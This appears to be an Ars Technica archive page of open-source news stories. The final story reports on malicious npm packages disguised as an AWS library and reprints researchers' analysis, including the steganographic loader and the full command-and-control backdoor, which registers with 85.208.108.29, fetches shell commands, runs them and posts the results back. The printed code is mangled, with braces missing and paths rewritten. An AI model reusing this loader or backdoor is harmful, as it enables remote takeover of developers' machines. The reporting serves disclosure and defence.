Open Source

Hugging Face clones OpenAI’s Deep Research in 24 hours

agentic AI, agents, AI, AI agents, Aymeric Roucher, chatgpt, chatgtp, code agents, Deep Research, DeepResearch, Google, Google Gemini, GPT-4o, Hugging Face, machine learning, Magnetic-One, microsoft, Open Source, open weights, Open weights AI, openai, smolagents / Rejus Almole / February 5, 2025

On Tuesday, Hugging Face researchers released an open source AI research agent called “Open Deep Research,” created by an in-house team as a challenge 24 hours after the launch of OpenAI’s Deep Research feature, which can autonomously browse the web and create research reports. The project seeks to match Deep Research’s performance while making the technology freely available to developers.

“While powerful LLMs are now freely available in open-source, OpenAI didn’t disclose much about the agentic framework underlying Deep Research,” writes Hugging Face on its announcement page. “So we decided to embark on a 24-hour mission to reproduce their results and open-source the needed framework along the way!”

Similar to both OpenAI’s Deep Research and Google’s implementation of its own “Deep Research” using Gemini (first introduced in December—before OpenAI), Hugging Face’s solution adds an “agent” framework to an existing AI model to allow it to perform multi-step tasks, such as collecting information and building the report as it goes along that it presents to the user at the end.

The open source clone is already racking up comparable benchmark results. After only a day’s work, Hugging Face’s Open Deep Research has reached 55.15 percent accuracy on the General AI Assistants (GAIA) benchmark, which tests an AI model’s ability to gather and synthesize information from multiple sources. OpenAI’s Deep Research scored 67.36 percent accuracy on the same benchmark.

As Hugging Face points out in its post, GAIA includes complex multi-step questions such as this one:

Which of the fruits shown in the 2008 painting “Embroidery from Uzbekistan” were served as part of the October 1949 breakfast menu for the ocean liner that was later used as a floating prop for the film “The Last Voyage”? Give the items as a comma-separated list, ordering them in clockwise order based on their arrangement in the painting starting from the 12 o’clock position. Use the plural form of each fruit.

To correctly answer that type of question, the AI agent must seek out multiple disparate sources and assemble them into a coherent answer. Many of the questions in GAIA represent no easy task, even for a human, so they test agentic AI’s mettle quite well.

Hugging Face clones OpenAI’s Deep Research in 24 hours Read More »

German router maker is latest company to inadvertently clarify the LGPL license

avm, Cisco, free and open source, Free Software Foundation, FSF, GPL, LGPL, Linksys, Open Source, open source licenses, SFLC, Tech / Rejus Almole / January 10, 2025

The GNU General Public License (GPL) and its “Lesser” version (LGPL) are widely known and used. Still, every so often, a networking hardware maker has to get sued to make sure everyone knows how it works.

The latest such router company to face legal repercussions is AVM, the Berlin-based maker of the most popular home networking products in Germany. Sebastian Steck, a German software developer, bought an AVM Fritz!Box 4020 (PDF) and, being a certain type, requested the source code that had been used to generate certain versions of the firmware on it.

According to Steck’s complaint (translated to English and provided in PDF by the Software Freedom Conservancy, or SFC), he needed this code to recompile a networking library and add some logging to “determine which programs on the Fritz!Box establish connections to servers on the Internet and which data they send.” But Steck was also concerned about AVM’s adherence to GPL 2.0 and LGPL 2.1 licenses, under which its FRITZ!OS and various libraries were licensed. The SFC states that it provided a grant to Steck to pursue the matter.

AVM provided source code, but it was incomplete, as “the scripts for compilation and installation were missing,” according to Steck’s complaint. This included makefiles and details on environment variables, like “KERNEL_LAYOUT,” necessary for compilation. Steck notified AVM, AVM did not respond, and Steck sought legal assistance, ultimately including the SFC.

Months later, according to the SFC, AVM provided all the relevant source code and scripts, but the suit continued. AVM ultimately paid Steck’s attorney fee. The case proved, once again, that not only are source code requirements real, but the LGPL also demands freedom, despite its “Lesser” name, and that source code needs to be useful in making real changes to firmware—in German courts, at least.

“The favorable result of this lawsuit exemplifies the power of copyleft—granting users the freedom to modify, repair, and secure the software on their own devices,” the SFC said in a press release. “Companies like AVM receive these immense benefits themselves. This lawsuit reminded AVM that downstream users must receive those very same rights under copyleft.”

As noted by the SFC, the case was brought in July 2023, but as is typical with German law, no updates on the case could be provided until after its conclusion. SFC posted its complaint, documents, and the source code ultimately provided by AVM and encouraged the company to publish its own documents since those are not automatically public in Germany.

German router maker is latest company to inadvertently clarify the LGPL license Read More »

Startup set to brick $800 kids robot is trying to open source it first

Open Source, Robots, Smart Home, Tech / Tim Belzer / December 20, 2024

Earlier this month, startup Embodied announced that it is going out of business and taking its Moxie robot with it. The $800 robots, aimed at providing emotional support for kids ages 5 to 10, would soon be bricked, the company said, because they can’t perform their core features without the cloud. Following customer backlash, Embodied is trying to create a way for the robots to live an open sourced second life.

Embodied CEO Paolo Pirjanian shared a document via a LinkedIn blog post today saying that people who used to be part of Embodied’s technical team are developing a “potential” and open source way to keep Moxies running. The document reads:

This initiative involves developing a local server application (‘OpenMoxie’) that you can run on your own computer. Once available, this community-driven option will enable you (or technically inclined individuals) to maintain Moxie’s basic functionality, develop new features, and modify her capabilities to better suit your needs—without reliance on Embodied’s cloud servers.

The notice says that after releasing OpenMoxie, Embodied plans to release “all necessary code and documentation” for developers and users.

Pirjanian said that an over-the-air (OTA) update is now available for download that will allow previously purchased Moxies to support OpenMoxie. The executive noted that Embodied is still “seeking long-term answers” but claimed that the update is a “vital first step” to “keep the door open” for the robot’s continued functionality.

At this time, OpenMoxie isn’t available and doesn’t have a release date. Embodied’s wording also seems careful to leave an opening for OpenMoxie to not actually release; although, the company seems optimistic.

However, there’s also a risk of users failing to update their robots in time and properly. Embodied noted that it won’t be able to support users who have trouble with the update or with OpenMoxie post-release. Updating the robot includes connecting to Wi-Fi and leaving it on for at least an hour.

Startup set to brick $800 kids robot is trying to open source it first Read More »

Company claims 1,000 percent price hike drove it from VMware to open source rival

Biz & IT, Broadcom, Open Source, vmware / Kris Guyer / December 2, 2024

Companies have been discussing migrating off of VMware since Broadcom’s takeover a year ago led to higher costs and other controversial changes. Now we have an inside look at one of the larger customers that recently made the move.

According to a report from The Register today, Beeks Group, a cloud operator headquartered in the United Kingdom, has moved most of its 20,000-plus virtual machines (VMs) off VMware and to OpenNebula, an open source cloud and edge computing platform. Beeks Group sells virtual private servers and bare metal servers to financial service providers. It still has some VMware VMs, but “the majority” of its machines are currently on OpenNebula, The Register reported.

Beeks’ head of production management, Matthew Cretney, said that one of the reasons for Beeks’ migration was a VMware bill for “10 times the sum it previously paid for software licenses,” per The Register.

According to Beeks, OpenNebula has enabled the company to dedicate more of its 3,000 bare metal server fleet to client loads instead of to VM management, as it had to with VMware. With OpenNebula purportedly requiring less management overhead, Beeks is reporting a 200 percent increase in VM efficiency since it now has more VMs on each server.

Beeks also pointed to customers viewing VMware as non-essential and a decline in VMware support services and innovation as drivers for it migrating from VMware.

Broadcom didn’t respond to Ars Technica’s request for comment.

Broadcom loses VMware customers

Broadcom will likely continue seeing some of VMware’s older customers decrease or abandon reliance on VMware offerings. But Broadcom has emphasized the financial success it has seen (PDF) from its VMware acquisition, suggesting that it will continue with its strategy even at the risk of losing some business.

Company claims 1,000 percent price hike drove it from VMware to open source rival Read More »

I, too, installed an open source garage door opener, and I’m loving it

APIs, apple home, Cars, esp32, Features, garage door, Garage Door Opener, GENIE, home assistant, home automation, homekit, ifttt, mqtt, Open Source, opengarage, Smart Home, Tech / Tim Belzer / November 15, 2024

Open source closed garage

OpenGarage restored my home automations and gave me a whole bunch of new ideas.

Hark! The top portion of a garage door has entered my view, and I shall alert my owner to it. Credit: Kevin Purdy

Like Ars Senior Technology Editor Lee Hutchinson, I have a garage. The door on that garage is opened and closed by a device made by a company that, as with Lee’s, offers you a way to open and close it with a smartphone app. But that app doesn’t work with my preferred home automation system, Home Assistant, and also looks and works like an app made by a garage door company.

I had looked into the ratgdo Lee installed, and raved about, but hooking it up to my particular Genie/Aladdin system would have required installing limit switches. So I instead installed an OpenGarage unit ($50 plus shipping). My garage opener now works with Home Assistant (and thereby pretty much anything else), it’s not subject to the whims of API access, and I’ve got a few ideas how to make it even better. Allow me to walk you through what I did, why I did it, and what I might do next.

Thanks, I’ll take it from here, Genie

Genie, maker of my Wi-Fi-capable garage door opener (sold as an “Aladdin Connect” system), is not in the same boat as the Chamberlain/myQ setup that inspired Lee’s project. There was a working Aladdin Connect integration in Home Assistant, until the company changed its API in January 2024. Genie said it would release its own official Home Assistant integration in June, and it did, but then it was quickly pulled back, seemingly for licensing issues. Since then, no updates on the matter. (I have emailed Genie for comment and will update this post if I receive reply.)

This is not egregious behavior, at least on the scale of garage door opener firms. And Aladdin’s app works with Google Home and Amazon Alexa, but not with Home Assistant or my secondary/lazy option, HomeKit/Apple Home. It also logs me out “for security” more often than I’d like and tells me this only after an iPhone shortcut refuses to fire. It has some decent features, but without deeper integrations, I can’t do things like have the brighter ceiling lights turn on when the door opens or flash indoor lights if the garage door stays open too long. At least not without Google or Amazon.

I’ve seen OpenGarage passed around the Home Assistant forums and subreddits over the years. It is, as the name implies, fully open source: hardware design, firmware, and app code, API, everything. It is a tiny ESP board that has an ultrasonic distance sensor and circuit relay attached. You can control and monitor it from a web browser, mobile or desktop, from IFTTT, MQTT, and with the latest firmware, you can get email alerts. I decided to pull out the 6-foot ladder and give it a go.

Prototypes of the OpenGarage unit. To me, they look like little USB-powered owls, just with very stubby wings. Credit: OpenGarage

Installing the little watching owl

You generally mount the OpenGarage unit to the roof of your garage, so the distance sensor can detect if your garage door has rolled up in front of it. There are options for mounting with magnetic contact sensors or a side view of a roll-up door, or you can figure out some other way in which two different sensor depth distances would indicate an open or closed door. If you’ve got a Security+ 2.0 door (the kind with the yellow antenna, generally), you’ll need an adapter, too.

The toughest part of an overhead install is finding a spot that gives the unit a view of your garage door, not too close to rails or other obstructing objects, but then close enough for the contact wires and USB micro cable to reach. Ideally, too, it has a view of your car when the door is closed and the car is inside, so it can report its presence. I’ve yet to find the right thing to do with the “car is inside or not” data, but the seed is planted.

OpenGarage’s introduction and explanation video.

My garage setup, like most of them, is pretty simple. There’s a big red glowing button on the wall near the door, and there are two very thin wires running from it to the opener. On the opener, there are four ports that you can open up with a screwdriver press. Most of the wires are headed to the safety sensor at the door bottom, while two come in from the opener button. After stripping a bit of wire to expose more cable, I pressed the contact wires from the OpenGarage into those same opener ports.

Wires running from terminal points in the back of a garage door opener, with one set of wires coming in from the bottom and pressed into the same press-fit holes. — The wire terminal on my Genie garage opener. The green and pink wires lead to the OpenGarage unit. Credit: Kevin Purdy

After that, I connected the wires to the OpenGarage unit’s screw terminals, then did some pencil work on the garage ceiling to figure out how far I could run the contact and micro-USB power cable, getting the proper door view while maintaining some right-angle sense of order up there. When I had reached a decent compromise between cable tension and placement, I screwed the sensor into an overhead stud and used a staple gun to secure the wires. It doesn’t look like a pro installed it, but it’s not half bad.

A garage ceiling, with drywall stud paint running across, a small device with wires running at right angles to the opener, and an opener rail beneath. — Where I ended up installing my OpenGarage unit. Key points: Above the garage door when open, view of the car below, not too close to rails, able to reach power and opener contact. Credit: Kevin Purdy

A very versatile board

If you’ve got everything placed and wired up correctly, opening the OpenGarage access point or IP address should give you an interface that shows you the status of your garage, your car (optional), and its Wi-Fi and external connections.

Image of OpenGarage web interface, showing a — The landing screen for the OpenGarage. You can only open the door or change settings if you know the device key (which you should change immediately). Credit: Kevin Purdy

It’s a handy webpage and a basic opener (provided you know the secret device key you set), but OpenGarage is more powerful in how it uses that data. OpenGarage’s device can keep a cloud connection open to Blynk or the maker’s own OpenThings.io cloud server. You can hook it up to MQTT or an IFTTT channel. It can send you alerts when your garage has been open a certain amount of time or if it’s open after a certain time of day.

Screenshot showing 5 sensors: garage, distance, restart, vehicle, and signal strength. — You’re telling me you can just… see the state of these things, at all times, on your own network? Credit: Kevin Purdy

You really don’t need a corporate garage coder

For me, the greatest benefit is in hooking OpenGarage up to Home Assistant. I’ve added an opener button to my standard dashboard (one that requires a long-press or two actions to open). I’ve restored the automation that turns on the overhead bulbs for five minutes when the garage door opens. And I can dig in if I want, like alerting me that it’s Monday night at 10 pm and I’ve yet to open the garage door, indicating I forgot to put the trash out. Or maybe some kind of NFC tag to allow for easy opening while on a bike, if that’s not a security nightmare (it might be).

Not for nothing, but OpenGarage is also a deeply likable bit of indie kit. It’s a two-person operation, with Ray Wang building on his work with the open and handy OpenSprinkler project, trading Arduino for ESP8266, and doing some 3D printing to fit the sensors and switches, and Samer Albahra providing mobile app, documentation, and other help. Their enthusiasm for DIY home control has likely brought out the same in others and certainly in me.

Kevin is a senior technology reporter at Ars Technica, covering open-source software, PC gaming, home automation, repairability, e-bikes, and tech history. He has previously worked at Lifehacker, Wirecutter, iFixit, and Carbon Switch.

I, too, installed an open source garage door opener, and I’m loving it Read More »

“MNT Reform Next” combines open source hardware and usable performance

FOSS, mnt reform, Open Source, Tech / Kris Guyer / September 10, 2024

mnt reformed —

New design has sleeker profile, uses more RAM and better CPU than the original.

Andrew Cunningham – Sep 10, 2024 6: 08 pm UTC

More streamlined (but still user-replaceable) battery packs are responsible for some of the Reform Next's space savings. — Enlarge / More streamlined (but still user-replaceable) battery packs are responsible for some of the Reform Next’s space savings.

MNT Research

The current booting prototype of the MNT Reform Next.

MNT Research
The casing prototype is still being prototyped with 3D prints, but the final version will be anodized aluminum.

MNT Research
One of three “port boards” that handle internal and external connectivity.

MNT Research
More streamlined (but still user-replaceable) battery packs are responsible for some of the Reform Next’s space savings.

MNT Research

The original MNT Reform laptop was an interesting experiment, an earnest stab at the idea of a laptop that used entirely open source, moddable hardware as well as open source software. But as a modern Internet-connected laptop, its chunky design and (especially) its super-slow processor let it down.

MNT Research has been upgrading the Reform laptop and its smaller counterpart, the Pocket Reform, continuously since we took a look at it two-and-a-half years ago. The most significant upgrade is probably the Rockchip RK3588 processor upgrade, which offers four ARM Cortex-A76 CPU cores (the same ones used in the Raspberry Pi 5’s Broadcom SoC) and four ARM Cortex-A55 cores, plus either 16GB or 32GB of RAM. While still not a high-end speed demon, these specs are enough to make it a competent workhorse laptop for browsing and productivity apps.

Now, MNT is revisiting the Reform with a more significant design update. The MNT Reform Next is smaller and thinner, defaults to a more traditional glass trackpad instead of a trackball, and is starting with the Rockchip RK3588 instead of the poky NXP/Freescale processor that the original laptop was saddled with.

MNT says that the new Reform’s thinner profile is enabled by splitting the motherboard into multiple, smaller boards that are easier to replace and by designing “completely custom battery packs that tightly integrated electronics into the mechanical structure.” MNT details a motherboard with a CPU module connected to it and three different “port boards” to add internal and external connectivity.

The batteries themselves are still user-replaceable LiFePO4 batteries, though there are switches on the motherboard for people who want to use Li-ion batteries instead. “This optional user choice trades longer runtime for less safety and environmental friendliness,” according to MNT’s blog post.

The new Reform adds additional ports, including HDMI and USB-C, and it retains the mechanical keyboard that we liked from the original. It charges over USB-C. It also features four PCIe lanes internally for connecting M.2 storage.

Per usual, MNT is announcing this product many months or years before it will be available. The company says the Reform Next is in the “prototype stage,” and to get the first batches, you’ll need to support the project via the Crowd Supply crowdfunding site first. Pricing and more detailed availability information haven’t been announced, but if the idea of an entirely open laptop still appeals to you, the company says it will have more to share “later this week.”

“MNT Reform Next” combines open source hardware and usable performance Read More »

Roblox announces AI tool for generating 3D game worlds from text

3D foundational model, 3D synthesis, AI, Biz & IT, game synthesis, gaming, generative ai, machine learning, multiplayer games, online games, Open Source, roblox, world generator, world synthesis / Rejus Almole / September 9, 2024

ease of use —

New AI feature aims to streamline game creation on popular online platform.

Benj Edwards – Sep 9, 2024 9: 46 pm UTC

On Friday, Roblox announced plans to introduce an open source generative AI tool that will allow game creators to build 3D environments and objects using text prompts, reports MIT Tech Review. The feature, which is still under development, may streamline the process of creating game worlds on the popular online platform, potentially opening up more aspects of game creation to those without extensive 3D design skills.

Roblox has not announced a specific launch date for the new AI tool, which is based on what it calls a “3D foundational model.” The company shared a demo video of the tool where a user types, “create a race track,” then “make the scenery a desert,” and the AI model creates a corresponding model in the proper environment.

The system will also reportedly let users make modifications, such as changing the time of day or swapping out entire landscapes, and Roblox says the multimodal AI model will ultimately accept video and 3D prompts, not just text.

A video showing Roblox’s generative AI model in action.

The 3D environment generator is part of Roblox’s broader AI integration strategy. The company reportedly uses around 250 AI models across its platform, including one that monitors voice chat in real time to enforce content moderation, which is not always popular with players.

Next-token prediction in 3D

Roblox’s 3D foundational model approach involves a custom next-token prediction model—a foundation not unlike the large language models (LLMs) that power ChatGPT. Tokens are fragments of text data that LLMs use to process information. Roblox’s system “tokenizes” 3D blocks by treating each block as a numerical unit, which allows the AI model to predict the most likely next structural 3D element in a sequence. In aggregate, the technique can build entire objects or scenery.

Anupam Singh, vice president of AI and growth engineering at Roblox, told MIT Tech Review about the challenges in developing the technology. “Finding high-quality 3D information is difficult,” Singh said. “Even if you get all the data sets that you would think of, being able to predict the next cube requires it to have literally three dimensions, X, Y, and Z.”

According to Singh, lack of 3D training data can create glitches in the results, like a dog with too many legs. To get around this, Roblox is using a second AI model as a kind of visual moderator to catch the mistakes and reject them until the proper 3D element appears. Through iteration and trial and error, the first AI model can create the proper 3D structure.

Notably, Roblox plans to open-source its 3D foundation model, allowing developers and even competitors to use and modify it. But it’s not just about giving back—open source can be a two-way street. Choosing an open source approach could also allow the company to utilize knowledge from AI developers if they contribute to the project and improve it over time.

The ongoing quest to capture gaming revenue

News of the new 3D foundational model arrived at the 10th annual Roblox Developers Conference in San Jose, California, where the company also announced an ambitious goal to capture 10 percent of global gaming content revenue through the Roblox ecosystem, and the introduction of “Party,” a new feature designed to facilitate easier group play among friends.

In March 2023, we detailed Roblox’s early foray into AI-powered game development tools, as revealed at the Game Developers Conference. The tools included a Code Assist beta for generating simple Lua functions from text descriptions, and a Material Generator for creating 2D surfaces with associated texture maps.

At the time, Roblox Studio head Stef Corazza described these as initial steps toward “democratizing” game creation with plans for AI systems that are now coming to fruition. The 2023 tools focused on discrete tasks like code snippets and 2D textures, laying the groundwork for the more comprehensive 3D foundational model announced at this year’s Roblox Developer’s Conference.

The upcoming AI tool could potentially streamline content creation on the platform, possibly accelerating Roblox’s path toward its revenue goal. “We see a powerful future where Roblox experiences will have extensive generative AI capabilities to power real-time creation integrated with gameplay,” Roblox said in a statement. “We’ll provide these capabilities in a resource-efficient way, so we can make them available to everyone on the platform.”

Roblox announces AI tool for generating 3D game worlds from text Read More »

Debate over “open source AI” term brings new push to formalize definition

AI, AI regulation, AI workshops, All Things Open, Biz & IT, chatgpt, chatgtp, flux, free software, GPT-4o, machine learning, Meta, Open Source, open source AI, Open Source Initiative, open weights, Open weights AI, openai, OSI, Raleigh, SB-1047, source available / Paul Patrick / August 27, 2024

Enlarge / A man peers over a glass partition, seeking transparency.

The Open Source Initiative (OSI) recently unveiled its latest draft definition for “open source AI,” aiming to clarify the ambiguous use of the term in the fast-moving field. The move comes as some companies like Meta release trained AI language model weights and code with usage restrictions while using the “open source” label. This has sparked intense debates among free-software advocates about what truly constitutes “open source” in the context of AI.

For instance, Meta’s Llama 3 model, while freely available, doesn’t meet the traditional open source criteria as defined by the OSI for software because it imposes license restrictions on usage due to company size or what type of content is produced with the model. The AI image generator Flux is another “open” model that is not truly open source. Because of this type of ambiguity, we’ve typically described AI models that include code or weights with restrictions or lack accompanying training data with alternative terms like “open-weights” or “source-available.”

To address the issue formally, the OSI—which is well-known for its advocacy for open software standards—has assembled a group of about 70 participants, including researchers, lawyers, policymakers, and activists. Representatives from major tech companies like Meta, Google, and Amazon also joined the effort. The group’s current draft (version 0.0.9) definition of open source AI emphasizes “four fundamental freedoms” reminiscent of those defining free software: giving users of the AI system permission to use it for any purpose without permission, study how it works, modify it for any purpose, and share with or without modifications.

By establishing clear criteria for open source AI, the organization hopes to provide a benchmark against which AI systems can be evaluated. This will likely help developers, researchers, and users make more informed decisions about the AI tools they create, study, or use.

Truly open source AI may also shed light on potential software vulnerabilities of AI systems, since researchers will be able to see how the AI models work behind the scenes. Compare this approach with an opaque system such as OpenAI’s ChatGPT, which is more than just a GPT-4o large language model with a fancy interface—it’s a proprietary system of interlocking models and filters, and its precise architecture is a closely guarded secret.

OSI’s project timeline indicates that a stable version of the “open source AI” definition is expected to be announced in October at the All Things Open 2024 event in Raleigh, North Carolina.

“Permissionless innovation”

In a press release from May, the OSI emphasized the importance of defining what open source AI really means. “AI is different from regular software and forces all stakeholders to review how the Open Source principles apply to this space,” said Stefano Maffulli, executive director of the OSI. “OSI believes that everybody deserves to maintain agency and control of the technology. We also recognize that markets flourish when clear definitions promote transparency, collaboration and permissionless innovation.”

The organization’s most recent draft definition extends beyond just the AI model or its weights, encompassing the entire system and its components.

For an AI system to qualify as open source, it must provide access to what the OSI calls the “preferred form to make modifications.” This includes detailed information about the training data, the full source code used for training and running the system, and the model weights and parameters. All these elements must be available under OSI-approved licenses or terms.

Notably, the draft doesn’t mandate the release of raw training data. Instead, it requires “data information”—detailed metadata about the training data and methods. This includes information on data sources, selection criteria, preprocessing techniques, and other relevant details that would allow a skilled person to re-create a similar system.

The “data information” approach aims to provide transparency and replicability without necessarily disclosing the actual dataset, ostensibly addressing potential privacy or copyright concerns while sticking to open source principles, though that particular point may be up for further debate.

“The most interesting thing about [the definition] is that they’re allowing training data to NOT be released,” said independent AI researcher Simon Willison in a brief Ars interview about the OSI’s proposal. “It’s an eminently pragmatic approach—if they didn’t allow that, there would be hardly any capable ‘open source’ models.”

Debate over “open source AI” term brings new push to formalize definition Read More »

The next Nvidia driver makes even more GPUs “open,” in a specific, quirky way

Biz & IT, CUDA, Linux, Linux kernel, NVIDIA, nvidia drivers, Open Source, Tech / Paul Patrick / July 18, 2024

You know open when you see it —

You can’t see inside the firmware, but more open code can translate it for you.

Kevin Purdy – Jul 18, 2024 5: 34 pm UTC

GeForce RTX 4060 cards on display in a case — Getty Images

You have to read the headline on Nvidia’s latest GPU announcement slowly, parsing each clause as it arrives.

“Nvidia transitions fully” sounds like real commitment, a burn-the-boats call. “Towards open-source GPU,” yes, evoking the company’s “first step” announcement a little over two years ago, so this must be progress, right? But, back up a word here, then finish: “GPU kernel modules.”

So, Nvidia has “achieved equivalent or better application performance with our open-source GPU kernel modules,” and added some new capabilities to them. And now most of Nvidia’s modern GPUs will default to using open source GPU kernel modules, starting with driver release R560, with dual GPL and MIT licensing. But Nvidia has moved most of its proprietary functions into a proprietary, closed-source firmware blob. The parts of Nvidia’s GPUs that interact with the broader Linux system are open, but the user-space drivers and firmware are none of your or the OSS community’s business.

Is it better than what existed before? Certainly. AMD and Intel have maintained open source GPU drivers, in both the kernel and user space, for years, though also with proprietary firmware. This brings Nvidia a bit closer to the Linux community and allows for community debugging and contribution. There’s no indication that Nvidia aims to go further with its open source moves, however, and its modules remain outside the main kernel, packaged up for users to install themselves.

Not all GPUs will be able to use the open source drivers: a number of chips from the Maxwell, Pascal, and Volta lines; GPUs from the Turing, Ampere, Ada Lovelace, and Hopper architectures are recommended to switch to the open bits; and Grace Hopper and Blackwell units must do so.

As noted by Hector Martin, a developer on the Asahi Linux distribution, at the time of the first announcement, this shift makes it easier to sandbox closed-source code while using Nvidia hardware. But the net amount of closed-off code is about the same as before.

Nvidia’s blog post has details on how to integrate its open kernel modules onto various systems, including CUDA setups.

The next Nvidia driver makes even more GPUs “open,” in a specific, quirky way Read More »

Here’s how carefully concealed backdoor in fake AWS files escaped mainstream notice

backdoors, Biz & IT, Open Source, Security, steganigraphy / Mike M. / July 15, 2024

DEVS IN THE CROSSHAIRS —

Files available on the open source NPM repository underscore a growing sophistication.

Dan Goodin – Jul 15, 2024 8: 18 pm UTC

A cartoon door leads to a wall of computer code.

Researchers have determined that two fake AWS packages downloaded hundreds of times from the open source NPM JavaScript repository contained carefully concealed code that backdoored developers’ computers when executed.

The packages—img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy—were attempts to appear as aws-s3-object-multipart-copy, a legitimate JavaScript library for copying files using Amazon’s S3 cloud service. The fake files included all the code found in the legitimate library but added an additional JavaScript file named loadformat.js. That file provided what appeared to be benign code and three JPG images that were processed during package installation. One of those images contained code fragments that, when reconstructed, formed code for backdooring the developer device.

Growing sophistication

“We have reported these packages for removal, however the malicious packages remained available on npm for nearly two days,” researchers from Phylum, the security firm that spotted the packages, wrote. “This is worrying as it implies that most systems are unable to detect and promptly report on these packages, leaving developers vulnerable to attack for longer periods of time.”

In an email, Phylum Head of Research Ross Bryant said img-aws-s3-object-multipart-copy received 134 downloads before it was taken down. The other file, legacyaws-s3-object-multipart-copy, got 48.

The care the package developers put into the code and the effectiveness of their tactics underscores the growing sophistication of attacks targeting open source repositories, which besides NPM have included PyPI, GitHub, and RubyGems. The advances made it possible for the vast majority of malware-scanning products to miss the backdoor sneaked into these two packages. In the past 17 months, threat actors backed by the North Korean government have targeted developers twice, one of those using a zero-day vulnerability.

Phylum researchers provided a deep-dive analysis of how the concealment worked:

Analyzing the loadformat.js file, we find what appears to be some fairly innocuous image analysis code.

However, upon closer review, we see that this code is doing a few interesting things, resulting in execution on the victim machine.

After reading the image file from the disk, each byte is analyzed. Any bytes with a value between 32 and 126 are converted from Unicode values into a character and appended to the analyzepixels variable.
function processImage(filePath)   	console.log("Processing image...");  	const data = fs.readFileSync(filePath);  	let analyzepixels = "";  	let convertertree = false;    	for (let i = 0; i < data.length; i++) {      	const value = data[i];      	if (value >= 32 && value <= 126) {          	analyzepixels += String.fromCharCode(value);      	} else {          	if (analyzepixels.length > 2000)               	convertertree = true;              	break;          	          	analyzepixels = "";      	  	}        	// ...  
The threat actor then defines two distinct bodies of a function and stores each in their own variables, imagebyte and analyzePixels.
let analyzePixеls = `  	if (false)       	exec("node -v", (error, stdout, stderr) =>           	console.log(stdout);      	);  	  	console.log("check nodejs version...");  	`;    let imagebyte = `  	const httpsOptions =       	hostname: 'cloudconvert.com',      	path: '/image-converter',      	method: 'POST'  	;  	const req = https.request(httpsOptions, res =>       	console.log('Status Code:', res.statusCode);  	);  	req.on('error', error =>       	console.error(error);  	);  	req.end();  	console.log("Executing operation...");  	`;  
If convertertree is set to true, imagebyte is set to analyzepixels. In plain language, if converttree is set, it will execute whatever is contained in the script we extracted from the image file.
if (convertertree)   	console.log("Optimization complete. Applying advanced features...");  	imagebyte = analyzepixels;   else   	console.log("Optimization complete. No advanced features applied.");    
Looking back above, we note that convertertree will be set to true if the length of the bytes found in the image is greater than 2,000.
if (analyzepixels.length > 2000)     convertertree = true;    break;    
The author then creates a new function using either code that sends an empty POST request to cloudconvert.com or initiates executing whatever was extracted from the image files.
const func = new Function('https', 'exec', 'os', imagebyte);  func(https, exec, os);  
The lingering question is, what is contained in the images that this is trying to execute?

Command-and-Control in a JPEG

Looking at the bottom of the loadformat.js file, we see the following:
processImage('logo1.jpg');  processImage('logo2.jpg');  processImage('logo3.jpg');  
We find these three files in the package’s root, which are included below without modification, unless otherwise noted.

Appears as logo1.jpg in the package

Appears as logo2.jpg in the package

Appears as logo3.jpg in the package. Modified here as the file is corrupted and in some cases would not display properly.

If we run each of these through the processImage(...) function from above, we find that the Intel image (i.e., logo1.jpg) does not contain enough “valid” bytes to set the converttree variable to true. The same goes for logo3.jpg, the AMD logo. However, for the Microsoft logo (logo2.jpg), we find the following, formatted for readability:
let fetchInterval = 0x1388;  let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);  const clientInfo =     'name': os.hostname(),    'os': os.type() + " " + os.release()  ;  const agent = new https.Agent(    'rejectUnauthorized': false  );  function registerClient()     const _0x47c6de = JSON.stringify(clientInfo);    const _0x5a10c1 =   	'hostname': "85.208.108.29",  	'port': 0x1bb,  	'path': "https://arstechnica.com/register",  	'method': "POST",  	'headers':     	'Content-Type': "application/json",    	'Content-Length': Buffer.byteLength(_0x47c6de)  	,  	'agent': agent    ;    const _0x38f695 = https.request(_0x5a10c1, _0x454719 =>   	console.log("Registered with server as " + clientInfo.name);    );    _0x38f695.on("error", _0x1159ec =>   	console.error("Problem with registration: " + _0x1159ec.message);    );    _0x38f695.write(_0x47c6de);    _0x38f695.end();    function fetchAndExecuteCommand()     const _0x2dae30 =   	'hostname': "85.208.108.29",  	'port': 0x1bb,  	'path': "https://arstechnica.com/get-command?clientId=" + encodeURIComponent(clientInfo.name),  	'method': "GET",  	'agent': agent    ;    https.get(_0x2dae30, _0x4a0c09 =>   	let _0x41cd12 = '';  	_0x4a0c09.on("data", _0x5cbbc5 =>     	_0x41cd12 += _0x5cbbc5.toString();  	);  	_0x4a0c09.on("end", () =>     	console.log("Received command:", _0x41cd12);    	if (_0x41cd12.startsWith('setInterval:'))       	const _0x1e3896 = parseInt(_0x41cd12.split(':')[0x1], 0xa);      	if (!isNaN(_0x1e3896) && _0x1e3896 > 0x0)         	clearInterval(intervalId);        	fetchInterval = _0x1e3896 0x3e8;        	intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);        	console.log("Interval has been updated to " + _0x1e3896 + " seconds.");      	 else         	console.log("Invalid interval command received.");      	    	 else       	if (_0x41cd12.startsWith("cd "))         	const _0x58bd7d = _0x41cd12.substring(0x3).trim();        	try           	process.chdir(_0x58bd7d);          	console.log("Changed directory to " + process.cwd());        	 catch (_0x2ee272)           	console.error("Change directory failed: " + _0x2ee272);        	      	 else if (_0x41cd12 !== "No commands")         	exec(_0x41cd12,           	'cwd': process.cwd()        	, (_0x5da676, _0x1ae10c, _0x46788b) =>           	let _0x4a96cd = _0x1ae10c;          	if (_0x5da676)             	console.error("exec error: " + _0x5da676);            	_0x4a96cd += "\nError: " + _0x46788b;          	          	postResult(_0x4a96cd);        	);      	 else         	console.log("No commands to execute");      	    	  	);    ).on("error", _0x2e8190 =>   	console.error("Got error: " + _0x2e8190.message);    );    function postResult(_0x1d73c1)     const _0xc05626 =   	'hostname': "85.208.108.29",  	'port': 0x1bb,  	'path': "https://arstechnica.com/post-result?clientId=" + encodeURIComponent(clientInfo.name),  	'method': "POST",  	'headers':     	'Content-Type': "text/plain",    	'Content-Length': Buffer.byteLength(_0x1d73c1)  	,  	'agent': agent    ;    const _0x2fcb05 = https.request(_0xc05626, _0x448ba6 =>   	console.log("Result sent to the server");    );    _0x2fcb05.on('error', _0x1f60a7 =>   	console.error("Problem with request: " + _0x1f60a7.message);    );    _0x2fcb05.write(_0x1d73c1);    _0x2fcb05.end();    registerClient();  
This code first registers the new client with the remote C2 by sending the following clientInfo to 85.208.108.29.
